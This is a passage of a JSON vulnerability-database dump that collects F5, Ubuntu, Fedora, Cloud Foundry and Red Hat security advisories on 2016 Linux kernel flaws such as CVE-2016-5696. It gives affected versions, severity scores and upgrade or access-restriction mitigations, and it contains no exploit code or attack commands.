| 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | Linux kernel \nBIG-IP GTM | 11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 \n11.2.1 | 13.0.1 - 13.1.0 
\n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | Linux kernel \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.1 - 13.1.0 \n12.1.3 \n12.1.2 HF1 \n11.6.2 - 11.6.3 | Medium | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.3.0 \n4.6.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Medium | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. 
For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n", "edition": 1, "modified": "2018-06-06T21:22:00", "published": "2017-03-28T07:36:00", "id": "F5:K90803619", "href": "https://support.f5.com/csp/article/K90803619", "title": "Linux kernel vulnerability CVE-2016-6136", "type": "f5", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-02-20T21:07:46", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "description": "\nF5 Product Development has assigned ID 610107 (BIG-IP), 
ID 461496 (ARX), and INSTALLER-2561 (Traffix SDC) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Medium| Linux kernel \nBIG-IP AAM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1| Medium| Linux kernel \nBIG-IP AFM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1| Medium| Linux kernel \nBIG-IP Analytics| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1| Medium| Linux kernel \nBIG-IP APM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Medium| Linux kernel \nBIG-IP ASM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Medium| Linux kernel \nBIG-IP DNS| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2| Medium| Linux kernel \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Medium| Linux kernel \nBIG-IP PEM| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.4.0 - 11.6.1| Medium| Linux kernel \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| 12.0.0 - 12.1.1 HF1| 12.1.1 HF2 \n11.6.0 - 11.6.1| Medium| Linux kernel \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 
4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0| None| Low| Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. 
For more information for the BIG-IP system, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-03-14T00:54:00", "published": "2016-08-26T20:35:00", "id": "F5:K46514822", "href": "https://support.f5.com/csp/article/K46514822", "title": "Linux TCP stack vulnerability CVE-2016-5696", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-10T21:24:57", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. 
For more information for the BIG-IP system, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-11-10T00:00:00", "published": "2016-08-26T00:00:00", "id": "SOL46514822", "href": "http://support.f5.com/kb/en-us/solutions/public/k/46/sol46514822.html", "type": "f5", "title": "SOL46514822 - Linux TCP stack vulnerability CVE-2016-5696", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "description": "Marco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the \nLinux kernel. A local attacker could use this to corrupt audit logs or \ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). 
(CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3097-1", "href": "https://ubuntu.com/security/notices/USN-3097-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:36:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "description": "Marco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the \nLinux kernel. A local attacker could use this to corrupt audit logs or \ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-13T00:00:00", "published": "2016-10-13T00:00:00", "id": "USN-3097-2", "href": "https://ubuntu.com/security/notices/USN-3097-2", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:44:22", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). 
(CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the \nLinux kernel. A local attacker could use this to corrupt audit logs or \ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3098-1", "href": "https://ubuntu.com/security/notices/USN-3098-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "description": "USN-3098-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 LTS.\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nVladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). 
(CVE-2016-7039)\n\nPengfei Wang discovered a race condition in the audit subsystem in the \nLinux kernel. A local attacker could use this to corrupt audit logs or \ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 68, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3098-2", "href": "https://ubuntu.com/security/notices/USN-3098-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:34:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). 
(CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3099-3", "href": "https://ubuntu.com/security/notices/USN-3099-3", "title": "Linux kernel (Raspberry Pi 2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:41:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "USN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nVladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). 
(CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3099-2", "href": "https://ubuntu.com/security/notices/USN-3099-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:44:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3099-4", "href": "https://ubuntu.com/security/notices/USN-3099-4", "title": "Linux kernel (Qualcomm Snapdragon) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039", "CVE-2016-6130"], "description": "Vladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB \nGeneric Receive Offload (GRO) processing implementations in the Linux \nkernel, A remote attacker could use this to cause a stack corruption, \nleading to a denial of service (system crash). 
(CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP \nretransmit queue handling code in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the s390 SCLP console driver \nfor the Linux kernel when handling ioctl()s. A local attacker could use \nthis to obtain sensitive information from kernel memory. (CVE-2016-6130)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller \ndriver in the Linux kernel when handling ioctl()s. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2016-6480)", "edition": 5, "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "USN-3099-1", "href": "https://ubuntu.com/security/notices/USN-3099-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "description": "The kernel meta package ", "modified": "2016-09-02T20:55:31", "published": "2016-09-02T20:55:31", "id": "FEDORA:6675C6051CCF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.7.2-201.fc24", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "description": "The kernel meta package ", "modified": "2016-09-02T23:22:48", "published": "2016-09-02T23:22:48", "id": "FEDORA:EF73760748F5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.7.2-101.fc23", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:42", "bulletinFamily": "software", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], 
"description": "USN-3099-2 Linux kernel vulnerabilities\n\n# \n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS\n\n# Description\n\nUSN-3099-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nVladim\u00edr Bene\u0161 discovered an unbounded recursion in the VLAN and TEB Generic Receive Offload (GRO) processing implementations in the Linux kernel. A remote attacker could use this to cause a stack corruption, leading to a denial of service (system crash). ([CVE-2016-7039](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7039.html>))\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP retransmit queue handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2016-6828](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6828.html>))\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller driver in the Linux kernel when handling ioctl()s. A local attacker could use this to cause a denial of service (system crash). 
([CVE-2016-6480](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6480.html>))\n\n# Affected Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including:\n * All versions prior to 3146.24\n * 3151.x versions prior to 3151.2\n * 3232.x versions prior to 3232.22\n * 3233.x versions prior to 3233.2\n * 3262.x versions prior to 3262.21\n * Other versions prior to 3263.7\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team recommends upgrading to the following BOSH stemcells:\n * Upgrade all versions prior to 3146.x to 3146.24\n * Upgrade 3151.x versions to 3151.2\n * Upgrade 3232.x versions to 3232.22\n * Upgrade 3233.x versions to 3233.2\n * Upgrade 3262.x versions to 3262.21\n * Upgrade other versions to 3263.7\n\n# Credit\n\nVladim\u00edr Bene\u0161, Marco Grassi, Pengfei Wang\n\n# References\n\n * <https://www.ubuntu.com/usn/usn-3099-2/>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6480.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6828.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7039.html>\n", "edition": 5, "modified": "2016-10-01T00:00:00", "published": "2016-10-01T00:00:00", "id": "CFOUNDRY:DC8819DC530904F76913C7D9F499576C", "href": "https://www.cloudfoundry.org/blog/usn-3099-2/", "title": "USN-3099-2 Linux kernel vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2017-11-01T17:37:52", "bulletinFamily": "unix", "cvelist": [], "description": "No description provided", "modified": "2016-10-03T18:34:10", "published": "2016-10-03T18:34:10", "href": "https://access.redhat.com/security/vulnerabilities/challengeack", "id": "2438571", "type": "redhat", "title": "Shared challenge ack vulnerability - CVE-2016-5696", "cvss": {"score": 0.0, "vector": 
"NONE"}}, {"lastseen": "2019-08-13T18:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented \nin the Linux kernel's networking subsystem allowed an off-path attacker to \nleak certain information about a given connection by creating congestion on \nthe global challenge ACK rate limit counter and then measuring the changes \nby probing packets. An off-path attacker could use this flaw to either \nterminate TCP connection and/or inject payload into non-secured TCP \nconnection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao from Cyber Security Group in the CS\ndepartment of University of California, Riverside, for reporting this issue.", "modified": "2018-03-19T16:29:53", "published": "2016-08-18T19:33:21", "id": "RHSA-2016:1632", "href": "https://access.redhat.com/errata/RHSA-2016:1632", "type": "redhat", "title": "(RHSA-2016:1632) Important: kernel-rt security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* It was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network. 
(CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting this issue.\n\nBug Fix(es):\n\n* Previously, the BUG_ON() signal appeared in the fs_clear_inode() function where the nfs_have_writebacks() function reported a positive value for nfs_inode->npages. As a consequence, a kernel panic occurred. The provided patch performs a serialization by holding the inode i_lock over the check of PagePrivate and locking the request, which fixes this bug. (BZ#1365163)", "modified": "2016-09-27T17:31:16", "published": "2016-09-27T15:08:46", "id": "RHSA-2016:1939", "href": "https://access.redhat.com/errata/RHSA-2016:1939", "type": "redhat", "title": "(RHSA-2016:1939) Important: kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:40", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting this issue.\n\nBug Fix(es):\n\n* When loading the Direct Rendering Manager (DRM) kernel module, the kernel panicked if DRM was previously unloaded. The kernel panic was caused by a memory leak of the ID Resolver (IDR2). 
With this update, IDR2 is loaded during kernel boot, and the kernel panic no longer occurs in the described scenario. (BZ#1353827)\n\n* When more than one process attempted to use the \"configfs\" directory entry at the same time, a kernel panic in some cases occurred. With this update, a race condition between a directory entry and a lookup operation has been fixed. As a result, the kernel no longer panics in the described scenario. (BZ#1353828)\n\n* When shutting down the system by running the halt -p command, a kernel panic occurred due to a conflict between the kernel offlining CPUs and the sched command, which used the sched group and the sched domain data without first checking the data. The underlying source code has been fixed by adding a check to avoid the conflict. As a result, the described scenario no longer results in a kernel panic. (BZ#1343894)\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1355980)\n\n* Previously, multiple Very Secure FTP daemon (vsftpd) processes on a directory with a large number of files led to a high contention rate on each inode's spinlock, which caused excessive CPU usage. With this update, a spinlock to protect a single memory-to-memory copy has been removed from the ext4_getattr() function. As a result, system CPU usage has been reduced and is no longer excessive in the described situation. (BZ#1355981)\n\n* When the gfs2_grow utility is used to extend Global File System 2 (GFS2), the next block allocation causes the GFS2 kernel module to re-read its resource group index. If multiple processes in the GFS2 module raced to do the same thing, one process sometimes overwrote a valid object pointer with an invalid pointer, which caused either a kernel panic or a file system corruption. 
This update ensures that the resource group object pointer is not overwritten. As a result, neither kernel panic nor file system corruption occur in the described scenario. (BZ#1347539)\n\n* Previously, the SCSI Remote Protocol over InfiniBand (IB-SRP) was disabled due to a bug in the srp_queue() function. As a consequence, an attempt to enable the Remote Direct Memory Access (RDMA) at boot caused the kernel to crash. With this update, srp_queue() has been fixed, and the system now boots as expected when RDMA is enabled. (BZ#1348062)\n\nEnhancement(s):\n\n* This update optimizes the efficiency of the Transmission Control Protocol (TCP) when the peer is using a window under 537 bytes in size. As a result, devices that use maximum segment size (MSS) of 536 bytes or fewer will experience improved network performance. (BZ#1354446)", "modified": "2018-06-06T20:24:11", "published": "2016-08-23T19:01:18", "id": "RHSA-2016:1664", "href": "https://access.redhat.com/errata/RHSA-2016:1664", "type": "redhat", "title": "(RHSA-2016:1664) Important: kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The 